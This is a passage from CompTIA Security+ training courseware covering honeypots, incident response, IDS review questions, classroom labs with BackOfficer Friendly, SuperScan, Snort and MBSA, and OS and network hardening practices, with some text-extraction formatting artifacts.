A few general principles apply when deploying honeypots. Perhaps most importantly, the honeypot must attract, and avoid tipping off, the attacker. This means that the honeypot should appear to have a normal operating system installation to avoid scaring off an intruder who might think the system is under surveillance. The host must also have something of interest for the intruder. Honeypots are often populated with phony data for the attacker to peruse in order to encourage repeat visits during which more data can be gathered. One needs to ensure that a honeypot does not become a staging ground for attacking other hosts, either inside or outside of the firewall. Outside the firewall, the honeypot could be used to attack other organizations, which has implications for liability of those that deploy the honeypot. Inside the firewall, the honeypot could be used to attack real servers and other network resources. However, it is unlikely that an organization would allow the intruder to continue to use a honeypot on the inside for an extended period (allowing him to upload and use attack tools on the honeypot). The goal for such organizations would be to detect and remove the intruder immediately, by closing any security gaps that allowed the intruder access to the network or by removing the employee in the case of an internal attacker.
Honeypots, ethics, and the law

There has been a debate in the white-hat community whether honeypots are ethical. After all, their goal is to deceive a potential intruder into thinking that the honeypot is a vulnerable host, and to encourage an attack on the honeypot. To some this is not only deception, but also entrapment, much like a police sting operation that induces people to commit crimes which they had no previous intention of committing. The verdict in the security community has been resounding: there is nothing wrong with deceiving an attacker into thinking that he or she is penetrating an actual host, as opposed to an intrusion detection mechanism. After all, it is the intruder that has malicious intent; the organization deploying the honeypot is merely enticing the attacker out into view. In regard to the entrapment argument, it is important to note that the honeypot does not convince one to attack it; it merely appears to be a vulnerable target. To be entrapped, one must be convinced by law enforcement officials to commit the crime. Not only is one not convinced by anyone in particular to attack the honeypot, the honeypot has nothing to do with law enforcement. It is merely a tool used to detect intruders. Honeypots are not a law enforcement tool, and it is doubtful that they could be used as evidence in court.
1223
D-1:
Working with a honeypot Heres why

BackOfficer Friendly lures out intruders by emulating a Back Orifice server, and a variety of other services such as FTP, HTTP, and SMTP. BackOfficer Friendly is located at nfr.com/resource/backOfficer.php. Although this is a Windows program, it is sometimes erroneously indicated that BackOfficer Friendly is for the Unix platform.
Heres how
See the classroom setup instructions for location of the download file. Students will have to work in pairs on this activity.
1 Download and install a copy of BackOfficer Friendly according to your Instructors directions
2 In the Taskbar, right-click the BackOfficer Friendly icon and choose Details 3 On the menu bar, choose
Options To view the Options menu.
4 What types of scans can be performed with this utility? 5 Select Listen for Telnet 6 At your partners computer, open a command window 7 Enter telnet 8 Enter o, followed by your partners computers IP address 9 At your own computer, observe what happens in the BackOfficer Friendly window
BackOfficer Friendly can listen for Back Orifice, FTP, Telnet, SMTP, HTTP, POP3 and IMAP2.
At the command prompt. For example, enter o 192.168.1.4.
The telnet connection is detected and displayed.
10 In BackOfficer Friendly, choose

Options
Enable all scanning options except Listen for ftp
In preparation for the next activity.

Do it!
D-2:
Working with SuperScan 3.0 Heres why

SuperScan 4 is a connect-based TCP port scanner, pinger, and hostname resolver. It enables you to perform ping scans and port scans using any IP address range. To conduct a scan on your own system.
Heres how
1 Download and install SuperScan 4 according to your Instructors direction 2 With BackOfficer Friendly still active, enter your computers IP address into the Hostname/IP box Click the right arrow next to your IP address 3 Click the blue arrow toward the bottom of the window 4 Switch back to BackOfficer Friendly
To add the IP address as an address to be scanned. To start the scan. Youll see the results being displayed in the field at the bottom of the screen. If the window didnt already pop up during the scan. The SuperScan activity displays in the window.
5 Close all open windows
Intrusion detection
1225
Topic E: Incident response

# 3.4 Objective Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system Incident Response
Dealing with intrusions

Explanation The ability of intrusion detection systems and honeypots to spot attacks against your organizations information assets is all well and good. However, having deployed them, one asks: What should be done when these systems detect an intrusion? Detecting an intrusion is simply not enough. Even if the active monitoring capabilities of the IDS managed to stop the attack in progress, many questions remain. Did the attacker gain access to sensitive data? How did the attack penetrate the network? Can the attacker do it again? Should law enforcement officials be involved? Every IDS deployment should include two documents: a solid IDS monitoring policy and procedure, and an incident response plan. These documents are written to answer these what now questions: How will the IDS be monitored? Who will monitor them? How will the organization respond in the event of an alert? Who is going to fix the vulnerability?
IDS monitoring
It is an unpleasant fact that the IDS needs to be monitored. Early on in their deployment, intrusion detection systems are likely to generate a high number of false positives; and though these will decrease as the IDS is tuned, the alarms still need to be investigated to determine how to tune the IDS. Later on, when the IDS installation is mature, an IDS alarm is a serious event that requires a response. Some network operations centers have 24 by 7 monitoring, but operations staffs rarely have the experience or skills to deal with an intrusion. To monitor the IDS effectively, organizations need to have well-documented monitoring procedures that detail actions for specific alerts. When operations personnel receive an IDS alert, they can refer to these procedures to determine whom to contact and what actions should be taken immediately, based on the type of alarm generated by the IDS.
1226 CompTIA Security+ Certification Information security incident response team

Once IDS has been monitored and the correct resources notified about an intrusion, the incident handling procedure comes into play. This procedure determines the steps that response personnel should follow in addressing the security breach. The steps taken depend on the level of seriousness, so a classification system is needed to categorize alarms. A sample alarm classification scheme might look like this: Level 3: The least threatening type of alarm, a level 3 incident would include a port scan or a single unauthorized attempt to telnet to a network device. Level 2: More serious, a level 2 incident might include unsuccessful attempts to obtain unauthorized access to systems. Continued level 3 attacks could also constitute a reason for escalating to level 2. Level 1: The most serious types of attack, level 1 incidents could include major denial-of-service attacks, successful intrusions into systems, or similar activities. Each level of severity will have its own sequence of actions to follow. Typically, incidents are reported to an Information Security Incident Response Team (SIRT), (whose membership is defined in the incident-handling procedure document). The SIRT assigns personnel who will assemble all needed resources to handle the reported incident. The incident coordinator makes decisions as to the interpretation of policy, standards, and procedures when applied to the incident. Typical objectives for the SIRT are: Determine how the incident happened. Establish a process for avoiding further exploitations of the same vulnerability. Avoid escalation and further incidents. Assess the impact and damage of the incident. Recover from the incident. Update procedures as needed. Determine who was responsible (if appropriate and possible). Involve legal counsel and law enforcement officials, as deemed appropriate by the organization and the seriousness of the intrusion. Depending on the seriousness of the attack, it is possible that only a subset of the above actions would need to be addressed.
1227
E-1:
Discussing incident response

1 SIRT stands for: A B
C
Security Information Response Team System Information Response Team Security Incident Response Team None of the above
2 What are some valuable steps in handling incidents? A B C D E F G

H
Determine how the incident happened. Establish a process for avoiding further exploitations of the same vulnerability. Avoid escalation and further incidents. Assess the impact and damage of the incident. Recover from the incident. Update procedures as needed. Determine who was responsible (if appropriate and possible). All of the above.
3 What information should be included in the IDS monitoring procedures?

The procedures should indicate the appropriate responsewhom to contact and what actions should be taken immediatelybased on the type of alarm generated by the IDS.
Unit summary: Intrusion detection

Topic A In this topic, you learned about intrusion detection systems and characteristics of intrusion detection products. You learned that intrusion detection provides monitoring of network resources to detect intrusions and attacks that were not stopped by the preventative techniques. In this topic, you learned about network-based and host-based intrusion detection systems and how these products are deployed for maximum effect. You learned that, although both technologies have their own strengths and weaknesses, they offer complimentary capabilities to each other and to firewalls and can significantly add to network security when properly tuned and vigilantly monitored. In this topic, you learned about passive and active IDS. You learned that active IDS can stop or prevent an attack by blocking offending traffic at the router or firewall, while passive IDS simply logs the attack and alerts administers. You also learned about the differences between anomaly-based and signature-based IDS. In this topic, you learned about honeypots. You learned that while honeypots are still not commonly deployed in business networks, they are gaining popularity and have the capability of adding to network security by gathering information about intruders and their methods of gaining entry into the network. In this topic, you learned about IDS monitoring and incident response. You discussed the importance of having well-documented procedures and a well-trained response team in place before an incident occurs.
Topic B
Topic C
Topic D
Topic E
Review questions
1 What is the defense in depth security strategy?
A multi-layered security approach that uses multiple techniques such as preventative technologies, security monitoring, and attack response to provide a robust security architecture.
2 Specify if each of the following are true or false positives or negatives. Occur when the IDS correctly identifies undesirable traffic.
True positive
Occur when the IDS correctly identifies normal traffic.

True negative
Occur when the IDS incorrectly identifies normal traffic as an attack.

False positive
Occur when the IDS incorrectly identifies an attack as normal traffic.

False negative
3 False negatives imply that the IDS failed to detect an attack. True or false?
True
4 False positives happen when the IDS mistakenly reports certain benign activity as malicious. True or false?
True
Intrusion detection
1229
5 What is the difference between host-based and network-based intrusion detection systems?
Network-based IDS (NIDS) monitor network traffic while host-based IDS (HIDS) monitor activity on a particular host machine.
6 NIDS typically use two NICs. What is each used for?

One operates in promiscuous mode to sniff passing traffic and the other is an administrative NIC that is used to send data such as alerts to a centralized management system.
7 Where are the typical locations for IDS sensors?

Just inside the firewall, on the DMZ, or on any subnets containing mission-critical servers.
8 What are the typical reaction types for network IDS reactions?
TCP resets, IP session logging, and shunning or blocking.
9 HIDS audit log files, monitor file checksums, evaluate requests by application for system resources, and monitor system processes for suspicious activities. True or false?
True
10 HIDS can only detect intrusions after the fact rather than proactively protecting the host. True or false?
False
11 What are the two main types of host-based IDS?

Host wrappers and agent-based software
12 Compare passive and active IDS.

Passive systems log security events, alert administrators when an attack occurs, and record the offending traffic for analysis, but do not take any preventive action to stop the attack. Active systems have all the logging, alerting, and recording features of passive IDS, with the additional ability to take action against the offending traffic.
13 Compare signature-based and anomaly-based IDS.

Signature detection is achieved by creating models of attacks, also called signatures. As events are monitored, they are compared to a model to determine whether the event qualifies as an intrusion. Anomaly detection takes the opposite position from signature detection. Rather than operate from signatures that define misuse or attacks on the network, anomaly detection creates a model of normal use and looks for activity that does not conform to that model.
14 What is typically the goal of deploying honeypots?

To gather information on hacker techniques, methodology, and tools.
15 Which of the following is true when deploying honeypots?

A
Honeypots must attract the attacker without tipping them off.
B Honeypots should never use the normal operating system. C Only real data is of interest to attackers so phony data should never be used. D Honeypots should only be placed outside the firewall.

16 Every IDS deployment should include documents describing the monitoring policy and procedure, and an incident response plan. True or false?
True
17 Early on in their deployment, intrusion detection systems are likely to generate a high number of false negatives. True or false?
False. When first set up, they are likely to generate false positives.
18 A well-documented monitoring procedure specifies whom operations personnel should contact. Information about what to do about the intrusion is not included in this document. True or false?
False. The document does include this information.
19 Deployment of a honeypot is seen by some as entrapment and, according to them, is therefore unethical. True or false?
True
20 Honeypots cannot be used to attack legitimate systems. True or false?

False. If you do not carefully structure the honeypot environment, attackers can launch attacks against your network or other networks from this environment.
Independent practice activities

Installing Snort on Windows-based systems Snort is an example of an IDS solution. After completing this activity, youll know how to install Snort for Windows. Note: The servers used in this activity will be referred to as Server-X and Server-Y. Please substitute the names of your servers for these names. 1 Log on to Server-X as Administrator. (If necessary) 2 Verify that WinPcap is installed on the server. (If it isnt, download WinPcap_3_1.exe according to your Instructors direction. Double-click the WinPcap_3_1.exe file, click Next three times, click OK and reboot Server-X and log on as Administrator.) 3 Create a folder called snort on C:\ (your local hard drive). 4 Download snort_243_Installer.exe from www.snort.org/dl/binaries/win32 to the snort folder. 5 Double-click the snort_243_Installer.exe file to start the installation. Accept all defaults and choose C:\snort as the destination folder. 6 Rename the snort.conf file in C:\snort\etc to snort.old. 7 Open snort.old with Wordpad (not Notepad). 8 Save the snort.old file as snort.conf in a text format. 9 Close Wordpad. 10 Rename the snort.conf.txt file to snort.conf. 11 Click Yes to accept the format change. 12 Repeat steps 1-11 above on Server-Y.
Intrusion detection Capturing packets with Snort
1231
After completing this activity, youll be able to understand how to use Snort to capture data packets, view the contents of the data packets, and create log files. Note: The servers used in this activity will be referred to as Server-X and Server-Y. Please substitute the names of your servers for these names. 1 On Server-X, click Start, Run, and type cmd. 2 Click OK. 3 Type cd \snort\bin and press Enter. 4 Enter snort W. Youll see a list of the available interfaces, each with a number assigned to it (1, 2, and so on). 5 Type snort v i followed by the number of the interface you want to listen to. For example, you might type snort v i 2 to listen to interface 2. 6 Press Enter. Youll see a screen similar to the one shown in Exhibit 12-4 below.
Exhibit 12-4: The snort interface initialization screen 7 On Server-Y, click Start, Run, and type cmd. 8 Click OK. 9 Type ping Server-X and press Enter. 10 On Server-X, view the results, as shown in Exhibit 12-5. Notice the ECHO and ECHO REPLY.
Exhibit 12-5: A Snort ping capture 11 On Server-X, press Ctrl+C to view the statistics, as shown in Exhibit 12-6. Notice that the protocols used were ICMP and ARP.
Exhibit 12-6: Snort ping capture statistics 12 On Server-X, at the command line enter snort v d i followed by the interface number to view the packet data. 13 On Server-Y, enter ping Server-X. 14 On Server-X, view the results. Youll see a screen similar to the one shown in Exhibit 12-7.
Intrusion detection
1233
Exhibit 12-7: A Snort ping capture with data 15 On Server-X, press Ctrl+C. 16 On Server-X, enter snort dev l \snort\log K ascii i followed by the interface number to log results to a log file. 17 Ping Server-X from Server-Y. 18 On Server-X, press Ctrl+C. 19 Navigate to the C:\snort\log folder and examine the contents. Use Notepad to open the files in the subfolder(s). 20 Repeat Steps 1 through 20 above in Server-Y. 21 Close all Windows. Creating a Snort rule set In this activity, youll create a simple Snort rule to alert you when the ICMP protocol is used. After completing this activity, youll be able to create a Snort rule set, and test the rules set on the network. Note: The servers used in this activity will be referred to as Server-X and Server-Y. Please substitute the names of your servers for these names. 1 Log on to Server-X as Administrator. (If necessary.) 2 Click Start, Run, and type notepad. 3 Click OK. 4 Enter the information shown in Exhibit 12-8.
Exhibit 12-8: A Snort rule set 5 Save the file as c:\snort\new.rules. Close Notepad. 6 Rename c:\snort\new.rules.txt to c:\snort\new.rules. Accept the format change when prompted. 7 On Server-X, open a Command window. 8 At the command line, enter cd \snort\bin. 9 At the command line, enter snort c \snort\new.rules K ascii l \snort\log i followed by the interface number. 10 From Server-Y, open Internet Explorer and enter http://Server-Xs IP address in the address box. Press Enter. 11 On Server-X, press Ctrl+C. 12 Navigate to the C:\snort\log folder. 13 In Server-Ys subfolder, examine the Web Traffic Logged in the TCP_*-80.ids files. It should look similar to Exhibit 12-9.
Exhibit 12-9: A Snort log file containing Web traffic
Intrusion detection
1235
14 On Server-X, change to the c:\snort\bin directory and then enter snort c \snort\new.rules K ascii l \snort\log i followed by the interface number. 15 On Server-Y, ping Server-X. 16 On Server-X, press Ctrl+C. 17 Navigate to the C:\snort\log folder. 18 Examine the contents of the alert.ids file. It should look similar to the one shown in Exhibit 12-10.
Exhibit 12-10: A Snort ICMP traffic alert log 19 Repeat steps 1-18 above on Server-Y. 20 Close all Windows and log off Server-X and Server-Y.
131
Unit 13 Security baselines

A Gain an understanding of OS/NOS
vulnerabilities and hardening practices.

B Explore common network hardening
practices, including firmware updates, access control lists, and configuration best practices.
C Harden application-layer servicessuch as
Web, e-mail, FTP, DNS, file/print, DHCP, and database repositoriesagainst attacks.
D Explain how to properly configure
workstations and servers and implement personal firewall software and antivirus packages.
132
Topic A: OS/NOS hardening

# 1.3 3.5 Objective Non-essential Services and Protocols Disabling unnecessary systems / process / programs. Understand the following concepts of Security Baselines, be able to explain what a Security Baseline is, and understand the implementation and configuration of each kind of intrusion detection system OS / NOS (Operating System / Network Operating System) Hardening File System Updates (Hotfixes, Service Packs, Patches)
Securing the operating system

Explanation Operating system/network operating system (OS/NOS) hardening is the process of modifying an operating systems default configuration to make it more secure from outside threats. This process might include removing unnecessary programs and services, setting access privileges, and applying patches to the system kernel to limit vulnerability. The OS can essentially be considered the brain of a typical computer system. Operating systems not only establish communication between the hardware and the software running on it, but also manage and facilitate the distribution of system resources across different tasks (as shown in Exhibit 13-1).
Exhibit 13-1: OS/NOS hardening
Security baselines
133
Its extremely important, therefore, for system administrators to protect the integrity and availability of operating systems from outside threats. Actions that could disrupt the functionality of a system can be categorized as follows: AttacksThese are intentional acts by malicious individuals either to gain unauthorized access to user data and system resources or to compromise other targets. MalfunctionsThese are hardware or software failures that may prevent a system from performing its tasks. ErrorsThese are unintentional acts, by external or internal users, that may adversely affect the functionality of a system.
Best practices
Although its almost impossible to achieve complete security of a system when its deployed as part of a network, IT managers can follow certain guidelines to safeguard the system from intruders. Following is a common list of best practices for operating system hardening: Identify and remove unused applications and services, which, if compromised, can reveal sensitive information about a system. Remove unused or unnecessary file shares. Implement and enforce strong password policies. Force periodic password changes. Remove or disable all expired or unneeded accounts. Limit the number of administrator accounts available. Set necessary privileges to ensure that resources are accessible on an as-needed basis. Set account lockout policies to discourage password cracking. Keep track of the latest security updates and hot fixes. Apply vendor-suggested upgrades and patches as they are made available. Back up the system on a periodic basis for restoration in case of emergency. Log all user account and administrative activity so you can conduct forensic analysis if the system is compromised. Documentation Keeping an external log of each critical system can increase system integrity and make future security-related maintenance much simpler. This hard log should include a list of all software and version numbers that are installed on the system. As users, groups, and access privileges are defined, and other critical decisions are made during the baselining process, they should be recorded in this document. Records of all backups and upgrades should also be maintained in this single reference. When a security patch is recommended for a certain combination of operating system and applications, you wont need to dig around in your active system to see if it applies; simply refer to the paper logs. A recommended method is to use a composition book for each critical system. Its obvious when pages are removed (they never should be), and its easy to take with you to analyze.
134
Do it!
A-1:
Using the Microsoft Baseline Security Analyzer Heres why

Microsoft Baseline Security Analyzer (MBSA) can scan local and remote machines for security issues with Microsoft Windows NT 4, Windows 2000, Windows Server 2003, Windows XP, IIS, SQL Server, Internet Explorer, and Office. Reports are generated with details after the scan is complete. In this activity, youll install MBSA and view the results. To download this file from Microsofts web site, go to www.microsoft.com/downloads. Search using the keyword mbsa.
Heres how
1 Log on to your server as Administrator
2 Download mbsasetup-en.msi according to your Instructors directions 3 Double-click the mbsasetupen.msi file Click Next 4 Select I accept the license
agreement
To start the MBSA Setup wizard.
Click Next 5 Click Next 6 Click Install 7 Click OK 8 Click Start, then choose All
Programs, Microsoft Baseline Security Analyzer 2.0 To acknowledge that the installation has finished. To start the program. To use the default folder.
Security baselines 9 Click Scan a computer Maximize the window

If necessary.
135
10 Click Start scan
(In the lower-left corner of the window.) Security update information downloads from the Internet and the scan begins. Note that this process may take some time to complete. The report shows what was scanned, the results of the scan, and how to fix any problems.
11 After the scan is complete, view the report 12 Close all windows
136
Do it!
A-2:
Discussing system hardening

1 Which of the following should be included in a list of system hardening best practices? (Choose all that apply.) A
B C D
Deny data access to all users but a select few. Identify and remove unused applications and services. Implement and enforce strong password policies. Limit the number of administrator accounts.
2 Which of the following are not actions that could disrupt the functionality of a system? A B C
D
Attacks Malfunctions Errors Data errors
3 Which of the following three statements about OS/NOS hardening is not true? A
B
OS/NOS hardening includes removal of unnecessary programs. OS/NOS hardening includes application hardening. OS/NOS hardening includes applying or adding patches to the system kernel.
Security baselines
137
File systems
Explanation File systems store data necessary to enable communication between an application and its supporting disk drives. File systems require special attention when youre securing the OS. Strong file-system security can not only stop inside file tampering but also stop hackers who have gained access to the system but not the files. Access privileges Operating systems provide the capability to set access privileges for files, directories, devices, and other data or code objects. Setting privileges and access controls protects information stored on the computer. Common privileges that can be set on files and directories are Read, Write, and Execute privileges. Denying Read access protects confidentiality of information. Denying Write access protects the integrity of information from unauthorized modification. Restricting execution privileges of most system-related tools to system administrators can prevent users and attackers from making intentional or unintentional configuration changes that could damage security. The principle of least privilege states that users should have the minimum amount of access needed to perform their jobs. Although it may be easier to give all employees access to a file repository so that they can easily share a file as its being modified, this practice opens up many possibilities for a breach of security. It might also be necessary to distinguish local access privileges from network access privileges. Application programs may request and be granted increased access privileges for some of their automated operations. On the other hand, a system administrator may want to limit users privileges based on their required scope. This can be done in a number of ways, as outlined in the following sections. Setting user and group privileges To assist in privilege assignment, the administrator should determine user groups and object groups, and identify required access for each object (file, directory, device) by each user group within the system. When setting privileges for users, you can usually simplify both the initial task and future updates by grouping users by common needs. Most operating systems allow rights to be granted to a group, which then propagates those privileges to all members of the group. For instance, all corporate accountants may have access to a folder of resources, accounting software, and several printers in a section of the building. Rights to each of those resources could be granted to the accounting group, and all accountants could be added to that group. If a new, generally available accounting resource is added, an administrator need only add it to the accounting group for all accountants to have access. Similarly, when an accountant is transferred to a different division, his or her user account is removed from the accounting group, thereby revoking in a single action the multiple accounting privileges that are no longer needed. Using groups does not prevent you from granting additional rights to a single user. Those would simply be added directly to the user account. Be sure to identify rights that are made available to a set of users because those users might be better represented by a group of users. Its also possible for a single user to gain privileges via membership in multiple groups in addition to those rights granted explicitly.
138
CompTIA Security+ Certification Configuring access controls
Emphasize that these are only guidelines, and adjustments might be needed to suit a particular environment. Remind students that the ultimate goal is to provide users with the least amount of access needed to accomplish their jobs.
When creating user groups, a system administrator configures the operating system to recognize the user groups, and then assigns individual users to the appropriate groups. Then, the system administrator configures access controls for all protected files, directories, devices, and other objects. The administrator should document all the configured permissions along with the rationales for them. Following are some of the common practices for setting file and data privileges: Restrict access of operating system source files, configuration files, and their directories to authorized system administrators. For UNIX systems, there should be no world-writable files unless specifically required by necessary application programs. For Windows NT-based systems, there should be no permissions allowing the Everyone group to modify files. For UNIX systems, if possible, mount file systems as read only and nosuid to preclude unauthorized changes to files and programs. Assign an access permission of immutable to all kernel files if its supported by the operating system (such as Linux). Establish all log files as append only if that option is available. Prevent users from installing, removing, or editing scripts without administrative review. Otherwise, malicious users could exploit these files to gain unauthorized access to data and system resources. Pay attention to access control inheritance when defining categories of files and users. Ensure that you configure the operating system so that newly created files and directories inherit appropriate access controls, and that access controls propagate down the directory hierarchies as intended when you assign them. Administrators should disable a subdirectorys ability to override top-level security directives unless that override is required. Malicious users can exploit a failure to use such practices and gain unauthorized access to other parts of the system. Implementing access control with Windows Server 2003 security templates One of the more difficult tasks for an administrator is determining the appropriate security settings for a network. There are so many possibilities that its very easy to miss an important setting, often resulting in a network full of security holes. Microsoft has created security templates to assist administrators with this task. In addition, Microsoft gives administrators the ability to create custom templates.
Do it!
A-3:
Defining security templates in Windows Server 2003 Heres why
Heres how
1 Choose Start, Run Type mmc and press e 2 Choose File, Add/Remove
Snap-in
To open the Add/Remove Snap-in window.
3 Click Add
To open the Add Standalone Snap-in window.
Security baselines 4 Under Snap-in, select

Security Templates
139
Click Add 5 Click Close 6 Click OK 7 Expand Security Templates 8 Expand C:\Windows\Security\Templates 9 Right-click C:\Windows\Security\Templates Choose New Template 10 Enter My Template Leave the description blank Click OK 11 Select and then expand My
Template From the shortcut menu. For the template name.
12 Select and then right-click

Restricted Groups
To display the shortcut menu.
Choose Add group 13 Type Administrators
To open the Add Group dialog box. To specify the group object.
14 Click OK twice 15 Select and then right-click

Registry To display the shortcut menu.
Choose Add Key

16 Under Registry, select
MACHINE
17 Click OK 18 Remove the CREATOR OWNER and SYSTEM groups
Click OK 19 Click OK
To Configure this key then Propagate inheritable permissions to all subkeys.
20 Close the Console1 Window 21 Save the Console with the name
My Console
22 Click Yes
To save the Security template.
Security baselines
1311
Installing and configuring file encryption capabilities

Explanation File encryption features, supported by certain operating systems, are useful if the operating systems access controls are not adequate to maintain the confidentiality of file contents. Certain operating systems do not support access control lists; this might make it necessary to deploy file encryption features. Encryption is a very resourceconsuming feature; therefore, the benefits of using it should be carefully weighed against the risks of not using it.
Updates, patches, and service packs

Due to the complexity of operating systems, security-related problems are often identified only after the OS has been released. Furthermore, it takes even more time for consumers to become aware of the problem, obtain the necessary patches, and install them on their systems. This gap gives potential intruders an opportunity to exploit the discovered security breach and launch related attacks on the system. To contain such risks, system administrators should keep track of security-related announcements that may apply to their systems. Depending on how critical the exposure is, the administrator may choose to disable the affected software until a solution (patch) can be applied to address the risk. Permanent fixes from vendors should be applied as they are made available. The following sections describe a systematic approach for addressing such issues. Establish procedures for monitoring security-related information Subscribing to mailing lists can enable administrators to receive important securityrelated announcements and to keep up with new developments and updates specific to their systems. There are also certain security-related sites, such as CERT or SANS, that educate users on industry best practices for security-related issues. Administrators may also seek out and monitor more discreet hacker sites, where exploits may appear prior to posting on a vendor site. Evaluate updates for applicability Certain software updates may not be applicable to a given systems configuration or to an organizations security requirements. System administrators should evaluate all the updates to determine their applicability to a given systems configuration before actually applying them to their systems. An up-to-date paper log of each system can help you quickly determine the applicability of a patch. Tests should be conducted in a lab environment to assess the effect of an update on a systems configuration. Plan the installation of applicable updates or patches The installation of an update or patch can itself cause security problems unless administered systematically based on a predefined plan. An inappropriately scheduled update might make information resources unavailable when needed by the system members. Furthermore, if an update must be performed on a large network, updates can lead to different and potentially incompatible versions of software on different parts of the network; this situation could cause information loss or corruption. The system might temporarily be placed in a more vulnerable state.

Updates can also cause problems in other installed software within the system; therefore, an update should be tested thoroughly in a test environment before being applied to production systems. If an update must be done on a live system, then schedule it during a period of light load, and ensure that sufficiently skilled personnel are available to back up critical files, to update and test the system, and to return the system to the original configuration if problems occur. Methods of updating a system depend on the topology of a system. System administrators can manually update small systems with a limited number of computers and workstations. However, depending on how big the network is, administrators may need to employ automated tools to apply software updates to a large number of computers. Updates that are conducted in an unsystematic and haphazard way could introduce new vulnerabilities to networks. Install updates using a documented plan In this step, system administrators follow a documented plan to apply the necessary software updates, using some or all of the tactics described in the previous section. The update plan as well as the necessary back-out procedures should be documented before the system is updated. Deploy new systems with the latest software Its important to make sure that new installations are compatible with planned upgrades. The hard log should include a list of updates installed on existing systems, and the administrator should keep an archive of required files, so that the new systems can be deployed with the most updated software. Its also recommended that system administrators install the most up-to-date driver software for all applications and system components. Those drivers typically address performance and security issues and are made available to the public as problems are discovered and resolved.
Security baselines Do it!
1313
A-4:
Discussing file system security

1 Which of the following is not required for securing file systems? A B C
D
Create the necessary user groups. Configure access controls. Configure file encryption. Avoid drive partitions.
2 System administrators should disable ___________ permissions for all executable files and binary files.
Write/Execute
3 Which of the following are privileges that can be set on an object? A B C

D
Read Write Execute All of the above
4 When youre setting file system permissions, individual user accounts should be assigned access whenever possible. True or false?
False. The principle of least privilege should be applied.
5 Which of the following are common practices for setting file and data privileges? A B C Restrict access of operating system source files, configuration files, and their directories to authorized system administrators. Establish all log files as append only if that option is available. Prevent users from installing, removing, or editing scripts without administrative review. Otherwise, malicious users could exploit these files to gain unauthorized access to data and system resources. Pay attention to access control inheritance when defining categories of files and users. All of the above.
D
E
Topic B: Network hardening

# 2.5 Objective Recognize and understand the administration of the following file transfer protocols and concepts Vulnerabilities 8.3 Naming Conventions 3.5 Understand the following concepts of Security Baselines, be able to explain what a Security Baseline is, and understand the implementation and configuration of each kind of intrusion detection system Network Hardening Updates (Firmware) Configuration Enabling and Disabling Services and Protocols Access Control Lists
Handling global network access

Explanation E-commerce and advances in information communications require todays networks to be globally accessible, thereby posing new challenges for security auditors. Businesses must let customers and trading partners into the network; the trade-off, unfortunately, is that such network designs are also very attractive for hackers and cyber-terrorists. Using malicious tools available on the Internet, attackers can penetrate a network, take control of routers and switches, obtain or destroy confidential information, and embed viruses, Trojans, or backdoors into critical business applications. Networks are also susceptible to outages that can have a negative impact on customer and trading partner relationships. Business continuity is an essential ingredient in any e-commerce environment. Its therefore crucial to have a network with availability as well as with adequate security.
Firmware updates
Generally speaking, firmware is programming that is inserted into erasable programmable read-only memory (erasable programmable ROM), thus becoming a permanent part of a computing device. Samples of firmware are the PC system BIOS and router and switch boot code. Firmware is created and tested like software (using micro code simulation). Firmware updates can be made available by the vendors as vulnerabilities and malfunctions are discovered within previous versions. When ready, such updates can be distributed like other software and, using a special user interface, installed in the programmable readonly memory by the user. Administrators should keep track of vendor announcements to determine if they apply to their systems, and upgrade firmware on their network devices as suggested by vendors.
Security baselines
1315
Network configuration
Networks typically facilitate data transmission by a process called routing. Routing is the process of deciding the disposition of each packet that a router receives, and then either forwarding or discarding the data packet. Routers store destination addresses in a data structure called the routing table. It can dynamically update its address base through interactions with other routers. The routing mechanism decides whether to forward or discard a packet by using the destination IP address in the packet header. Routing functions and supporting structures are designed to route packets efficiently and reliably, not securely. Therefore, a routing process should not be used to implement security policy. Rather, firewall systems should govern security of information flow into and out of the network. Most firewall systems routing configurations are static, and hence less receptive to attacks. Assigning network addresses for interfaces on a firewall device Each network to which a firewall device is attached has a procedure to obtain new IP addresses. For the Internet, IP addressing is typically obtained from the Internet service provider (ISP) that connects to the firewall. For internal networks, including configured demilitarized zone (DMZ) networks, administrators can obtain IP addresses from within the organization. The IP addresses used internally typically come from the RFC 1918 IP address specification, which is not routable across the Internet without necessary translation. Establishing the routing configuration A firewall systems routing table contains a list of IP addresses for which the firewall system provides routing services. The routing decision is made based on the destination network address of the data packet being processed by the firewall. If the destination address exists in the routing table, the table provides the address of the next hop. If there is no next hop associated with the destination, the packet is discarded. An Internet Control Message Protocol (ICMP) unreachable message, indicating that the packet was undeliverable, may be returned to the source. When youre replacing an existing firewall system, its important to understand the network topology described by the routing configuration. The routing configuration of the new firewall system must be consistent with the current system. An organizations network security policy should require that the routing configuration of a firewall system be performed in an environment isolated from the production network. This policy should also specify what connectivity is to be permitted with the specific statements and deny all other connectivity. The routing configuration is derived from the network topology and should not be used to implement aspects of an organizations security policy. Some firewall designs implement a two-tier firewall architecture with a DMZ so that all inbound and outbound packets travel through both firewall systems. In these designs, the outside firewall is typically configured with more general packet-filtering rules. As packets move toward the internal network, filtering rules become more specific and complex.

Best practices for routers and firewalls Following are common best practices that should be taken into account when youre configuring router and firewall systems: Its very important to keep a copy of the current configurations of the network devices at a safe location on your network. Attacks, power outages, and configuration changes that may produce unexpected results might necessitate configuration backups. Never allow IP-directed broadcasts through the system. Smurf attacks may exploit this vulnerability. Configure devices with meaningful host names to make it easy to troubleshoot problems within the network. IP addresses without names prolong troubleshooting efforts, causing inefficient utilization of resources and time. Because not all software can handle uppercase correctly, lowercase naming conventions scale better. Always use a description for each interface. Its a good practice to use the circuit number as part of the description for wide area network (WAN) links. Always specify bandwidth on the interfaces even if its not needed. Certain routing protocols use bandwidth information to calculate the routing metrics when building their routing tables. Always configure a loopback address. Because the loopback interface is a logical interface, depending on the topology of the network, you can still access a device using a loopback interface regardless of the status of the primary physical interface. The use of a logical interface could also provide redundant paths to conduct Simple Network Management Protocol (SNMP) polling. A stable interface is very important for protocols such as Systems Network Architecture (SNA), which is very sensitive to time delays and outages. Despite its benefits in managing a network, SNMP can be very dangerous if not handled with proper care. An SNMP agent together with a set of SNMP application entities is known as an SNMP community. SNMP has two types of communities: Read Only and Read/Write. If the associated password is compromised, hackers can exploit the Read/Write community to execute unauthorized configuration changes. Avoid using common words for password and naming schemes. Dictionarybased password crackers can be used by malicious users to take advantage of such practices. Using tools such as SYSLOG, deploy logging throughout your network to collect information about interface status, events, and debugging and to place that information on a central logging server. Even if a hacker were able to modify the logs of a compromised system, he or she would then also need to break into the SYSLOG server to get that copy. Restrict data traffic to required ports and protocols only.
Security baselines
1317
Access control lists

